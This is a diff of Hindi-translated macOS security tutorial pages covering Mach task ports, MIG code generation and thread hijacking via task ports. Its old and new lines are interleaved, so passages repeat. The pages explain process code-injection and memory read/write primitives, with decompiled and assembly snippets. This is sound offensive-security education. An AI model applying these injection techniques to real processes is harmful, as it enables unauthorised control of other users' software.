- यदि ऐप के पास **`com.apple.security.get-task-allow` अधिकार** हैं, तो **समान उपयोगकर्ता** के प्रक्रियाएँ कार्य पोर्ट तक पहुँच सकती हैं (आम तौर पर डिबगिंग के लिए Xcode द्वारा जोड़ा गया)। **नोटरीकरण** प्रक्रिया इसे उत्पादन रिलीज़ में अनुमति नहीं देगी।
- **`com.apple.system-task-ports`** अधिकार वाले ऐप किसी भी प्रक्रिया के लिए **कार्य पोर्ट प्राप्त कर सकते हैं**, सिवाय कर्नेल के। पुराने संस्करणों में इसे **`task_for_pid-allow`** कहा जाता था। यह केवल Apple अनुप्रयोगों को दिया जाता है।
- **रूट कार्य पोर्ट** तक पहुँच सकता है उन अनुप्रयोगों के **जो** एक **हर्डनड** रनटाइम के साथ संकलित नहीं हैं (और Apple से नहीं हैं)।
- यदि ऐप के पास **`com.apple.security.get-task-allow` अधिकार** हैं, तो **समान उपयोगकर्ता** के प्रक्रियाएँ कार्य पोर्ट तक पहुँच सकती हैं (आम तौर पर डिबगिंग के लिए Xcode द्वारा जोड़ा जाता है)। **नोटरीकरण** प्रक्रिया इसे उत्पादन रिलीज़ में अनुमति नहीं देगी।
- **`com.apple.system-task-ports`** अधिकार वाले ऐप्स किसी भी प्रक्रिया के लिए **कार्य पोर्ट प्राप्त कर सकते हैं**, सिवाय कर्नेल के। पुराने संस्करणों में इसे **`task_for_pid-allow`** कहा जाता था। यह केवल Apple अनुप्रयोगों को दिया जाता है।
- **रूट कार्य पोर्ट्स** तक पहुँच सकता है उन अनुप्रयोगों के **जो** एक **हर्डनड** रनटाइम के साथ संकलित नहीं हैं (और Apple से नहीं हैं)।
**कार्य नाम पोर्ट:** _कार्य पोर्ट_ का एक अप्रिविलेज्ड संस्करण। यह कार्य को संदर्भित करता है, लेकिन इसे नियंत्रित करने की अनुमति नहीं देता। इसके माध्यम से उपलब्ध एकमात्र चीज `task_info()` प्रतीत होती है।
### थ्रेड पोर्ट
### थ्रेड पोर्ट्स
थ्रेड्स के साथ भी संबंधित पोर्ट होते हैं, जो कार्य से **`task_threads`** को कॉल करने और प्रोसेसर से `processor_set_threads` से दिखाई देते हैं। थ्रेड पोर्ट पर SEND अधिकार `thread_act` उपप्रणाली से कार्यों का उपयोग करने की अनुमति देता है, जैसे:
@ -558,7 +558,7 @@ return 0;
{{#endtab}}
{{#endtabs}}
**पिछले प्रोग्राम को संकलित करें** और कोड इंजेक्ट करने के लिए **अधिकार** जोड़ें उसी उपयोगकर्ता के साथ (यदि नहीं, तो आपको **sudo** का उपयोग करना होगा)।
**पार्श्विक** पिछले प्रोग्राम को संकलित करें और कोड इंजेक्ट करने के लिए **अधिकार** जोड़ें उसी उपयोगकर्ता के साथ (यदि नहीं, तो आपको **sudo** का उपयोग करना होगा)।
<details>
@ -778,7 +778,7 @@ macOS में **थ्रेड्स** को **Mach** के माध्य
इसलिए, **थ्रेड को सुधारने** के लिए इसे **`pthread_create_from_mach_thread`** को कॉल करना चाहिए जो **एक मान्य pthread बनाएगा**। फिर, यह नया pthread **dlopen** को कॉल कर सकता है ताकि **सिस्टम से एक dylib लोड किया जा सके**, इसलिए विभिन्न क्रियाओं को करने के लिए नए शेलकोड को लिखने के बजाय कस्टम पुस्तकालयों को लोड करना संभव है।
आप **उदाहरण dylibs** पा सकते हैं (उदाहरण के लिए वह जो एक लॉग उत्पन्न करता है और फिर आप इसे सुन सकते हैं):
आप **उदाहरण dylibs** पा सकते हैं (उदाहरण के लिए, वह जो एक लॉग उत्पन्न करता है और फिर आप इसे सुन सकते हैं):
{{#ref}}
../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
@ -1064,7 +1064,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
```
### थ्रेड हाईजैकिंग द्वारा टास्क पोर्ट <a href="#step-1-thread-hijacking" id="step-1-thread-hijacking"></a>
इस तकनीक में प्रक्रिया के एक थ्रेड को हाईजैक किया जाता है:
इस तकनीक में प्रक्रिया का एक थ्रेड हाईजैक किया जाता है:
{{#ref}}
macos-thread-injection-via-task-port.md
@ -1076,7 +1076,7 @@ macos-thread-injection-via-task-port.md
## अपवाद पोर्ट
जब एक थ्रेड में कोई अपवाद होता है, तो यह अपवाद थ्रेड के निर्दिष्ट अपवाद पोर्ट पर भेजा जाता है। यदि थ्रेड इसे संभाल नहीं पाता है, तो इसे टास्क अपवाद पोर्ट पर भेजा जाता है। यदि टास्क इसे संभाल नहीं पाता है, तो इसे होस्ट पोर्ट पर भेजा जाता है जिसे launchd द्वारा प्रबंधित किया जाता है (जहां इसे स्वीकार किया जाएगा)। इसे अपवाद ट्रायेज कहा जाता है।
जब एक थ्रेड में कोई अपवाद होता है, तो यह अपवाद थ्रेड के निर्दिष्ट अपवाद पोर्ट पर भेजा जाता है। यदि थ्रेड इसे संभाल नहीं करता है, तो इसे टास्क अपवाद पोर्ट पर भेजा जाता है। यदि टास्क इसे संभाल नहीं करता है, तो इसे होस्ट पोर्ट पर भेजा जाता है जिसे launchd द्वारा प्रबंधित किया जाता है (जहां इसे स्वीकार किया जाएगा)। इसे अपवाद ट्रायेज कहा जाता है।
ध्यान दें कि अंत में, यदि इसे सही तरीके से संभाला नहीं गया, तो रिपोर्ट को ReportCrash डेमन द्वारा संभाला जाएगा। हालांकि, एक ही टास्क में दूसरे थ्रेड के लिए अपवाद को प्रबंधित करना संभव है, यही वह है जो क्रैश रिपोर्टिंग टूल जैसे `PLCreashReporter` करता है।
@ -1087,13 +1087,13 @@ macos-thread-injection-via-task-port.md
कोई भी उपयोगकर्ता घड़ी के बारे में जानकारी प्राप्त कर सकता है, हालांकि समय सेट करने या अन्य सेटिंग्स को संशोधित करने के लिए रूट होना आवश्यक है।
जानकारी प्राप्त करने के लिए `clock` सबसिस्टम से फ़ंक्शंस को कॉल करना संभव है जैसे: `clock_get_time`, `clock_get_attributtes` या `clock_alarm`\
मानों को संशोधित करने के लिए `clock_priv` सबसिस्टम का उपयोग किया जा सकता है जैसे `clock_set_time` और `clock_set_attributes`
मानों को संशोधित करने के लिए `clock_priv` सबसिस्टम का उपयोग किया जा सकता है जैसे `clock_set_time` और `clock_set_attributes` के साथ
### प्रोसेसर और प्रोसेसर सेट
प्रोसेसर एपीआई एकल लॉजिकल प्रोसेसर को नियंत्रित करने की अनुमति देता है, फ़ंक्शंस को कॉल करके जैसे `processor_start`, `processor_exit`, `processor_info`, `processor_get_assignment`...
प्रोसेसर एपीआई एकल लॉजिकल प्रोसेसर को नियंत्रित करने की अनुमति देते हैं, फ़ंक्शंस को कॉल करके जैसे `processor_start`, `processor_exit`, `processor_info`, `processor_get_assignment`...
इसके अलावा, **प्रोसेसर सेट** एपीआई कई प्रोसेसर को एक समूह में समूहित करने का एक तरीका प्रदान करता है। डिफ़ॉल्ट प्रोसेसर सेट को प्राप्त करने के लिए **`processor_set_default`** को कॉल करना संभव है।\
इसके अलावा, **प्रोसेसर सेट** एपीआई कई प्रोसेसर को एक समूह में समूहित करने का एक तरीका प्रदान करते हैं। डिफ़ॉल्ट प्रोसेसर सेट को प्राप्त करने के लिए **`processor_set_default`** को कॉल करना संभव है।\
ये कुछ दिलचस्प एपीआई हैं जो प्रोसेसर सेट के साथ इंटरैक्ट करने के लिए हैं:
- `processor_set_statistics`
@ -1105,7 +1105,7 @@ macos-thread-injection-via-task-port.md
जैसा कि [**इस पोस्ट**](https://reverse.put.as/2014/05/05/about-the-processor_set_tasks-access-to-kernel-memory-vulnerability/) में उल्लेख किया गया है, अतीत में, यह पहले से उल्लेखित सुरक्षा को बायपास करने की अनुमति देता था ताकि अन्य प्रक्रियाओं में टास्क पोर्ट प्राप्त किए जा सकें और उन्हें **`processor_set_tasks`** को कॉल करके नियंत्रित किया जा सके और हर प्रक्रिया पर एक होस्ट पोर्ट प्राप्त किया जा सके।\
आजकल, उस फ़ंक्शन का उपयोग करने के लिए आपको रूट की आवश्यकता है और यह सुरक्षित है, इसलिए आप केवल असुरक्षित प्रक्रियाओं पर इन पोर्ट्स को प्राप्त कर सकेंगे।
आप इसे इस तरह आजमा सकते हैं:
आप इसे आजमा सकते हैं:
<details>

30
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -12,7 +12,7 @@ MIG को **Mach IPC** कोड निर्माण की प्रक्
- **Subsystem declaration**: कीवर्ड subsystem का उपयोग **नाम** और **id** को इंगित करने के लिए किया जाता है। यदि सर्वर को कर्नेल में चलाना है तो इसे **`KernelServer`** के रूप में चिह्नित करना भी संभव है।
- **Inclusions and imports**: MIG C-preprocessor का उपयोग करता है, इसलिए यह आयातों का उपयोग करने में सक्षम है। इसके अलावा, उपयोगकर्ता या सर्वर द्वारा उत्पन्न कोड के लिए `uimport` और `simport` का उपयोग करना संभव है।
- **Type declarations**: डेटा प्रकारों को परिभाषित करना संभव है हालांकि आमतौर पर यह `mach_types.defs` और `std_types.defs` को आयात करेगा। कस्टम के लिए कुछ सिंटैक्स का उपयोग किया जा सकता है:
- **Type declarations**: डेटा प्रकारों को परिभाषित करना संभव है, हालांकि आमतौर पर यह `mach_types.defs` और `std_types.defs` को आयात करेगा। कस्टम के लिए कुछ सिंटैक्स का उपयोग किया जा सकता है:
- \[i`n/out]tran`: फ़ंक्शन जिसे एक आने वाले या जाने वाले संदेश से अनुवादित करने की आवश्यकता है
- `c[user/server]type`: किसी अन्य C प्रकार के लिए मैपिंग।
- `destructor`: जब प्रकार को जारी किया जाता है तो इस फ़ंक्शन को कॉल करें।
@ -40,19 +40,19 @@ server_port : mach_port_t;
n1 : uint32_t;
n2 : uint32_t);
```
ध्यान दें कि पहला **आर्गुमेंट बाइंड करने के लिए पोर्ट है** और MIG **स्वचालित रूप से उत्तर पोर्ट को संभालेगा** (जब तक कि क्लाइंट कोड में `mig_get_reply_port()` को कॉल नहीं किया जाता)। इसके अलावा, **ऑपरेशनों का ID** **क्रमिक** होगा जो निर्दिष्ट सबसिस्टम ID से शुरू होगा (तो यदि कोई ऑपरेशन अप्रचलित है, तो इसे हटा दिया जाता है और इसके ID का उपयोग करने के लिए `skip` का उपयोग किया जाता है)।
ध्यान दें कि पहला **आर्गुमेंट बाइंड करने के लिए पोर्ट है** और MIG **स्वचालित रूप से उत्तर पोर्ट को संभालेगा** (जब तक कि क्लाइंट कोड में `mig_get_reply_port()` को कॉल नहीं किया जाता)। इसके अलावा, **ऑपरेशनों का ID** **क्रमिक** होगा जो निर्दिष्ट सबसिस्टम ID से शुरू होगा (इसलिए यदि कोई ऑपरेशन अप्रचलित है, तो इसे हटा दिया जाता है और इसके ID का उपयोग करने के लिए `skip` का उपयोग किया जाता है)।
अब MIG का उपयोग करें ताकि सर्वर और क्लाइंट कोड उत्पन्न किया जा सके जो एक-दूसरे के साथ संवाद कर सके और Subtract फ़ंक्शन को कॉल कर सके:
```bash
mig -header myipcUser.h -sheader myipcServer.h myipc.defs
```
वर्तमान निर्देशिका में कई नए फ़ाइलें बनाई जाएंगी।
कई नए फ़ाइलें वर्तमान निर्देशिका में बनाई जाएंगी।
> [!TIP]
> आप अपने सिस्टम में एक अधिक जटिल उदाहरण पा सकते हैं: `mdfind mach_port.defs`\
> और आप इसे फ़ाइल के समान फ़ोल्डर से संकलित कर सकते हैं: `mig -DLIBSYSCALL_INTERFACE mach_ports.defs`
फ़ाइलों **`myipcServer.c`** और **`myipcServer.h`** में आप संरचना **`SERVERPREFmyipc_subsystem`** की घोषणा और परिभाषा पा सकते हैं, जो मूल रूप से प्राप्त संदेश ID के आधार पर कॉल करने के लिए फ़ंक्शन को परिभाषित करता है (हमने 500 की प्रारंभिक संख्या निर्दिष्ट की):
फ़ाइलों **`myipcServer.c`** और **`myipcServer.h`** में आप संरचना **`SERVERPREFmyipc_subsystem`** की घोषणा और परिभाषा पा सकते हैं, जो मूल रूप से प्राप्त संदेश ID के आधार पर कॉल करने के लिए फ़ंक्शन को परिभाषित करता है (हमने 500 की प्रारंभिक संख्या निर्दिष्ट की है):
{{#tabs}}
{{#tab name="myipcServer.c"}}
@ -104,11 +104,11 @@ return 0;
return SERVERPREFmyipc_subsystem.routine[msgh_id].stub_routine;
}
```
इस उदाहरण में हमने परिभाषाओं में केवल 1 फ़ंक्शन परिभाषित किया है, लेकिन यदि हम अधिक फ़ंक्शन परिभाषित करते, तो वे **`SERVERPREFmyipc_subsystem`** के ऐरे के अंदर होते और पहला फ़ंक्शन ID **500** को सौंपा जाता, दूसरा फ़ंक्शन ID **501** को...
इस उदाहरण में हमने परिभाषाओं में केवल 1 फ़ंक्शन को परिभाषित किया है, लेकिन यदि हम अधिक फ़ंक्शन परिभाषित करते, तो वे **`SERVERPREFmyipc_subsystem`** के ऐरे के अंदर होते और पहला फ़ंक्शन ID **500** को सौंपा जाता, दूसरा फ़ंक्शन ID **501** को...
यदि फ़ंक्शन से **reply** भेजने की अपेक्षा की जाती, तो फ़ंक्शन `mig_internal kern_return_t __MIG_check__Reply__<name>` भी मौजूद होता।
वास्तव में, इस संबंध की पहचान **`myipcServer.h`** से **`subsystem_to_name_map_myipc`** संरचना में की जा सकती है (**`subsystem*to_name_map*\***`\*\* अन्य फ़ाइलों में):
वास्तव में, इस संबंध की पहचान **`myipcServer.h`** में **`subsystem_to_name_map_myipc`** संरचना में की जा सकती है (**`subsystem*to_name_map*\***`\*\* अन्य फ़ाइलों में):
```c
#ifndef subsystem_to_name_map_myipc
#define subsystem_to_name_map_myipc \
@ -132,7 +132,7 @@ mig_routine_t routine;
OutHeadP->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(InHeadP->msgh_bits), 0);
OutHeadP->msgh_remote_port = InHeadP->msgh_reply_port;
/* न्यूनतम आकार: routine() इसे अपडेट करेगा यदि अलग हो */
/* न्यूनतम आकार: routine() इसे अपडेट करेगा यदि यह भिन्न है */
OutHeadP->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);
OutHeadP->msgh_local_port = MACH_PORT_NULL;
OutHeadP->msgh_id = InHeadP->msgh_id + 100;
@ -217,7 +217,7 @@ USERPREFSubtract(port, 40, 2);
### NDR_record
NDR_record को `libsystem_kernel.dylib` द्वारा निर्यात किया जाता है, और यह एक संरचना है जो MIG को **डेटा को इस तरह से परिवर्तित करने की अनुमति देती है कि यह उस सिस्टम से स्वतंत्र हो** जिस पर इसका उपयोग किया जा रहा है क्योंकि MIG को विभिन्न सिस्टमों के बीच उपयोग करने के लिए सोचा गया था (और केवल एक ही मशीन में नहीं)।
NDR_record को `libsystem_kernel.dylib` द्वारा निर्यात किया जाता है, और यह एक संरचना है जो MIG को **डेटा को इस तरह से परिवर्तित करने की अनुमति देती है कि यह उस सिस्टम के प्रति अज्ञेय हो** जिस पर इसका उपयोग किया जा रहा है क्योंकि MIG को विभिन्न सिस्टमों के बीच उपयोग करने के लिए सोचा गया था (और केवल एक ही मशीन में नहीं)।
यह दिलचस्प है क्योंकि यदि `_NDR_record` किसी बाइनरी में एक निर्भरता के रूप में पाया जाता है (`jtool2 -S <binary> | grep NDR` या `nm`), तो इसका मतलब है कि बाइनरी एक MIG क्लाइंट या सर्वर है।
@ -229,9 +229,9 @@ NDR_record को `libsystem_kernel.dylib` द्वारा निर्या
### jtool
जैसे कि कई बाइनरी अब MACH पोर्ट्स को उजागर करने के लिए MIG का उपयोग करती हैं, यह जानना दिलचस्प है कि **कैसे पहचानें कि MIG का उपयोग किया गया था** और **फंक्शंस जो MIG प्रत्येक संदेश ID के साथ निष्पादित करता है**।
जैसे कि कई बाइनरी अब MACH पोर्ट्स को उजागर करने के लिए MIG का उपयोग करती हैं, यह जानना दिलचस्प है कि **कैसे पहचानें कि MIG का उपयोग किया गया था** और **प्रत्येक संदेश ID के साथ MIG द्वारा निष्पादित कार्य**।
[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/#jtool2) एक Mach-O बाइनरी से MIG जानकारी को पार्स कर सकता है, जो संदेश ID को इंगित करता है और निष्पादित करने के लिए फ़ंक्शन की पहचान करता है:
[**jtool2**](../../macos-apps-inspecting-debugging-and-fuzzing/#jtool2) एक Mach-O बाइनरी से MIG जानकारी को पार्स कर सकता है, जो संदेश ID को इंगित करता है और निष्पादित करने के लिए कार्य की पहचान करता है:
```bash
jtool2 -d __DATA.__const myipc_server | grep MIG
```
@ -241,7 +241,7 @@ jtool2 -d __DATA.__const myipc_server | grep BL
```
### Assembly
यह पहले उल्लेख किया गया था कि वह फ़ंक्शन जो **प्राप्त संदेश ID के आधार पर सही फ़ंक्शन को कॉल करेगा** वह `myipc_server` था। हालाँकि, आपके पास आमतौर पर बाइनरी के प्रतीक नहीं होंगे (कोई फ़ंक्शन नाम नहीं), इसलिए यह दिलचस्प है कि **यह कैसे दिखता है डिकंपाइल किया गया** क्योंकि यह हमेशा बहुत समान होगा (इस फ़ंक्शन का कोड उन फ़ंक्शनों से स्वतंत्र है जो प्रदर्शित होते हैं):
यह पहले उल्लेख किया गया था कि वह फ़ंक्शन जो **प्राप्त संदेश ID के आधार पर सही फ़ंक्शन को कॉल करेगा** वह `myipc_server` था। हालाँकि, आपके पास आमतौर पर बाइनरी के प्रतीक नहीं होंगे (कोई फ़ंक्शन नाम नहीं), इसलिए यह दिलचस्प है कि **यह कैसे डिकंपाइल किया गया है** क्योंकि यह हमेशा बहुत समान होगा (इस फ़ंक्शन का कोड उन फ़ंक्शनों से स्वतंत्र है जो प्रदर्शित होते हैं):
{{#tabs}}
{{#tab name="myipc_server decompiled 1"}}
@ -249,7 +249,7 @@ jtool2 -d __DATA.__const myipc_server | grep BL
<pre class="language-c"><code class="lang-c">int _myipc_server(int arg0, int arg1) {
var_10 = arg0;
var_18 = arg1;
// उचित फ़ंक्शन पॉइंटर्स खोजने के लिए प्रारंभिक निर्देश
// उचित फ़ंक्शन पॉइंटर खोजने के लिए प्रारंभिक निर्देश
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
@ -271,7 +271,7 @@ rax = *(int32_t *)(var_10 + 0x14);
var_4 = 0x0;
}
else {
// 2 तर्कों के साथ उचित फ़ंक्शन को कॉल करने का पता लगाया गय
// 2 तर्कों के साथ उचित फ़ंक्शन को कॉल करने के लिए गणना की गई पत
<strong> (var_20)(var_10, var_18);
</strong> var_4 = 0x1;
}
@ -297,7 +297,7 @@ saved_fp = r29;
stack[-8] = r30;
var_10 = arg0;
var_18 = arg1;
// उचित फ़ंक्शन पॉइंटर्स खोजने के लिए प्रारंभिक निर्देश
// उचित फ़ंक्शन पॉइंटर खोजने के लिए प्रारंभिक निर्देश
*(int32_t *)var_18 = *(int32_t *)var_10 &#x26; 0x1f | 0x0;
*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);
*(int32_t *)(var_18 + 0x4) = 0x24;
@ -340,7 +340,7 @@ r8 = 0x1;
var_4 = 0x0;
}
else {
// उस पता को कॉल करना जहां फ़ंक्शन होना चाहिए
// उस गणना की गई पते को कॉल करें जहाँ फ़ंक्शन होना चाहिए
<strong> (var_20)(var_10, var_18);
</strong> var_4 = 0x1;
}

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
View File

@ -9,11 +9,11 @@
## 1. Thread Hijacking
शुरुआत में, **`task_threads()`** फ़ंक्शन को कार्य पोर्ट पर दूरस्थ कार्य से थ्रेड सूची प्राप्त करने के लिए लागू किया जाता है। एक थ्रेड को हाईजैकिंग के लिए चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न है क्योंकि नए दूरस्थ थ्रेड को बनाने की अनुमति नहीं है क्योंकि नई रोकथाम `thread_create_running()` को अवरुद्ध करती है।
शुरुआत में, **`task_threads()`** फ़ंक्शन को कार्य पोर्ट पर दूरस्थ कार्य से थ्रेड सूची प्राप्त करने के लिए लागू किया जाता है। एक थ्रेड को हाईजैक करने के लिए चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न है क्योंकि नए दूरस्थ थ्रेड को बनाने की अनुमति नहीं है क्योंकि नई रोकथाम `thread_create_running()` को अवरुद्ध करती है।
थ्रेड को नियंत्रित करने के लिए, **`thread_suspend()`** को कॉल किया जाता है, जिससे इसकी निष्पादन रुक जाती है।
दूरस्थ थ्रेड पर केवल **रोकना** और **शुरू करना**, **पंजीकरण मान** प्राप्त करना और **संशोधित करना** की अनुमति है। दूरस्थ फ़ंक्शन कॉल को पंजीकरण `x0` से `x7` को **आर्गुमेंट्स** पर सेट करके, **`pc`** को लक्षित फ़ंक्शन पर कॉन्फ़िगर करके, और थ्रेड को सक्रिय करके आरंभ किया जाता है। यह सुनिश्चित करना कि थ्रेड लौटने के बाद क्रैश न हो, लौटने का पता लगाने की आवश्यकता होती है।
दूरस्थ थ्रेड पर केवल **रोकना** और **शुरू करना**, **पंजीकरण** मानों को **प्राप्त करना** और **संशोधित करना** की अनुमति है। दूरस्थ फ़ंक्शन कॉल को पंजीकरण `x0` से `x7` को **आर्गुमेंट्स** पर सेट करके, **`pc`** को लक्षित फ़ंक्शन पर कॉन्फ़िगर करके, और थ्रेड को सक्रिय करके आरंभ किया जाता है। यह सुनिश्चित करना कि थ्रेड लौटने के बाद क्रैश न हो, लौटने का पता लगाने की आवश्यकता होती है।
एक रणनीति में दूरस्थ थ्रेड के लिए **एक्सेप्शन हैंडलर** को `thread_set_exception_ports()` का उपयोग करके पंजीकृत करना शामिल है, फ़ंक्शन कॉल से पहले `lr` पंजीकरण को एक अमान्य पते पर सेट करना। यह फ़ंक्शन निष्पादन के बाद एक अपवाद को ट्रिगर करता है, अपवाद पोर्ट पर एक संदेश भेजता है, थ्रेड की स्थिति की जांच करने की अनुमति देता है ताकि लौटने का मान पुनर्प्राप्त किया जा सके। वैकल्पिक रूप से, इयान बीयर के ट्रिपल_fetch एक्सप्लॉइट से अपनाई गई विधि में, `lr` को अनंत लूप में सेट किया जाता है। थ्रेड के पंजीकरण को तब लगातार मॉनिटर किया जाता है जब तक **`pc` उस निर्देश की ओर इशारा नहीं करता**।
@ -27,13 +27,13 @@
एक रणनीति में `thread_set_special_port()` का उपयोग करके दूरस्थ थ्रेड के `THREAD_KERNEL_PORT` में स्थानीय पोर्ट के लिए एक भेजने का अधिकार रखना शामिल है। फिर, दूरस्थ थ्रेड को `mach_thread_self()` को कॉल करने के लिए निर्देशित किया जाता है ताकि भेजने का अधिकार प्राप्त किया जा सके।
दूरस्थ पोर्ट के लिए, प्रक्रिया मूल रूप से उलट होती है। दूरस्थ थ्रेड को `mach_reply_port()` के माध्यम से एक Mach पोर्ट उत्पन्न करने के लिए निर्देशित किया जाता है (क्योंकि `mach_port_allocate()` इसकी वापसी तंत्र के कारण अनुपयुक्त है)। पोर्ट निर्माण के बाद, `mach_port_insert_right()` को दूरस्थ थ्रेड में एक भेजने का अधिकार स्थापित करने के लिए लागू किया जाता है। यह अधिकार फिर `thread_set_special_port()` का उपयोग करके कर्नेल में रखा जाता है। स्थानीय कार्य में वापस, `thread_get_special_port()` का उपयोग दूरस्थ कार्य में नए आवंटित Mach पोर्ट के लिए भेजने के अधिकार को प्राप्त करने के लिए किया जाता है।
दूरस्थ पोर्ट के लिए, प्रक्रिया मूल रूप से उलट होती है। दूरस्थ थ्रेड को `mach_reply_port()` के माध्यम से एक Mach पोर्ट उत्पन्न करने के लिए निर्देशित किया जाता है (क्योंकि `mach_port_allocate()` इसकी वापसी तंत्र के कारण अनुपयुक्त है)। पोर्ट निर्माण के बाद, `mach_port_insert_right()` को दूरस्थ थ्रेड में एक भेजने का अधिकार स्थापित करने के लिए लागू किया जाता है। इस अधिकार को फिर `thread_set_special_port()` का उपयोग करके कर्नेल में रखा जाता है। स्थानीय कार्य में वापस, `thread_get_special_port()` का उपयोग दूरस्थ कार्य में नए आवंटित Mach पोर्ट के लिए भेजने के अधिकार को प्राप्त करने के लिए किया जाता है।
इन चरणों के पूरा होने से Mach पोर्ट स्थापित होते हैं, जो द्विदिशीय संचार के लिए आधार तैयार करते हैं।
## 3. Basic Memory Read/Write Primitives
इस अनुभाग में, बुनियादी मेमोरी पढ़ने और लिखने की प्राइमिटिव स्थापित करने के लिए निष्पादित प्राइमिटिव का उपयोग करने पर ध्यान केंद्रित किया गया है। ये प्रारंभिक कदम दूरस्थ प्रक्रिया पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस चरण में प्राइमिटिव का बहुत अधिक उपयोग नहीं होगा। जल्द ही, उन्हें अधिक उन्नत संस्करणों में अपग्रेड किया जाएगा।
इस अनुभाग में, बुनियादी मेमोरी पढ़ने और लिखने की प्राइमिटिव स्थापित करने के लिए निष्पादित प्राइमिटिव का उपयोग करने पर ध्यान केंद्रित किया गया है। ये प्रारंभिक कदम दूरस्थ प्रक्रिया पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस चरण में प्राइमिटिव का अधिक उपयोग नहीं होगा। जल्द ही, उन्हें अधिक उन्नत संस्करणों में अपग्रेड किया जाएगा।
### Memory Reading and Writing Using Execute Primitive
@ -58,9 +58,9 @@ _write_func:
str x1, [x0]
ret
```
### उपयुक्त फ़ंक्शं की पहचान करना
### उपयुक्त फ़ंक्शनों की पहचान
सामान्य पुस्तकालयों का स्कैन इन ऑपरेशनों के लिए उपयुक्त उम्मीदवारों को प्रकट करता है:
सामान्य पुस्तकालयों का स्कैन इन ऑपरेशनों के लिए उपयुक्त उम्मीदवारों का खुलासा करता है:
1. **मेमोरी पढ़ना:**
`property_getName()` फ़ंक्शन [Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से मेमोरी पढ़ने के लिए एक उपयुक्त फ़ंक्शन के रूप में पहचाना गया है। फ़ंक्शन नीचे वर्णित है:
@ -98,7 +98,7 @@ _xpc_int64_set_value(address - 0x18, value)
2. **दूरस्थ प्रक्रिया में साझा मेमोरी बनाना**:
- दूरस्थ प्रक्रिया में `malloc()` के लिए एक दूरस्थ कॉल के साथ `OS_xpc_shmem` ऑब्जेक्ट के लिए मेमोरी आवंटित करें।
- स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री को दूरस्थ प्रक्रिया में कॉपी करें। हालाँकि, यह प्रारंभिक कॉपी ऑफसेट `0x18` पर गलत मच मेमोरी प्रविष्टि नाम होगा
- स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री को दूरस्थ प्रक्रिया में कॉपी करें। हालाँकि, यह प्रारंभिक कॉपी ऑफसेट `0x18` पर गलत मच मेमोरी प्रविष्टि नामों के साथ होगी
3. **मच मेमोरी प्रविष्टि को सही करना**:
@ -109,7 +109,7 @@ _xpc_int64_set_value(address - 0x18, value)
- दूरस्थ `OS_xpc_shmem` ऑब्जेक्ट को मान्य करें।
- `xpc_shmem_remote()` के लिए एक दूरस्थ कॉल के साथ साझा मेमोरी मैपिंग स्थापित करें।
इन चरणों का पालन करके, स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी को प्रभावी ढंग से सेट किया जाएगा, जिससे डेटा ट्रांसफर और कई तर्कों की आवश्यकता वाले कार्यों के निष्पादन के लिए सीधा रास्ता मिलेगा
इन चरणों का पालन करके, स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी को प्रभावी ढंग से सेट किया जाएगा, जिससे सरल डेटा ट्रांसफर और कई तर्कों की आवश्यकता वाले कार्यों के निष्पादन की अनुमति मिलेगी
## अतिरिक्त कोड स्निपेट्स
@ -123,7 +123,7 @@ xpc_shmem_create();
malloc(); // for allocating memory remotely
thread_set_special_port(); // for inserting send right
```
याद रखें कि साझा मेमोरी सेटअप को सही ढंग से कार्य करने के लिए Mach पोर्ट और मेमोरी एंट्री नामों के विवरण को सही तरीके से संभालना आवश्यक है।
याद रखें कि Mach पोर्ट और मेमोरी एंट्री नामों के विवरण को सही तरीके से संभालना आवश्यक है ताकि साझा मेमोरी सेटअप सही तरीके से कार्य करे
## 5. पूर्ण नियंत्रण प्राप्त करना
@ -140,17 +140,17 @@ thread_set_special_port(); // for inserting send right
3. **Mach पोर्ट ट्रांसफर**:
- पहले से स्थापित पोर्ट के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट का स्थानांतरण करें।
- पहले से स्थापित पोर्ट के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट स्थानांतरित करें।
4. **फाइल डिस्क्रिप्टर ट्रांसफर**:
- `triple_fetch` में Ian Beer द्वारा उजागर की गई तकनीक का उपयोग करके प्रक्रियाओं के बीच फाइल डिस्क्रिप्टर्स का स्थानांतरण करें।
- `triple_fetch` में Ian Beer द्वारा उजागर की गई तकनीक का उपयोग करके प्रक्रियाओं के बीच फाइल डिस्क्रिप्टर्स स्थानांतरित करें।
यह व्यापक नियंत्रण [threadexec](https://github.com/bazad/threadexec) पुस्तकालय के भीतर संकुचित है, जो पीड़ित प्रक्रिया के साथ बातचीत के लिए एक विस्तृत कार्यान्वयन और उपयोगकर्ता के अनुकूल API प्रदान करता है।
## महत्वपूर्ण विचार:
- सिस्टम स्थिरता और डेटा अखंडता बनाए रखने के लिए मेमोरी पढ़ने/लिखने के संचालन के लिए `memcpy()` का उचित उपयोग सुनिश्चित करें।
